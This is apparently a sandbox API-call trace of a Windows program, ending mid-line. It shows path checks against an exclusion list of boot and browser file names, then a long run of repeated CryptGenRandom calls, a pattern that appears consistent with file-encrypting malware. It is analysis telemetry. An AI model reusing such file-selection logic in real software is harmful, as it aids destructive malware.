0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*NTDETECT.COM*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*ntldr*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*chrome*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*opera*") returned 0 [0155.449] PathMatchSpecW (pszFile="osknumpad.xml", pszSpec="*firefox*") returned 0 [0155.449] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml", pszSpec="*") returned 1 [0155.449] strlen (_Str="NMoreira") returned 0x8 [0155.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.449] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.450] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.451] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.452] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.453] CryptGenRandom (in: 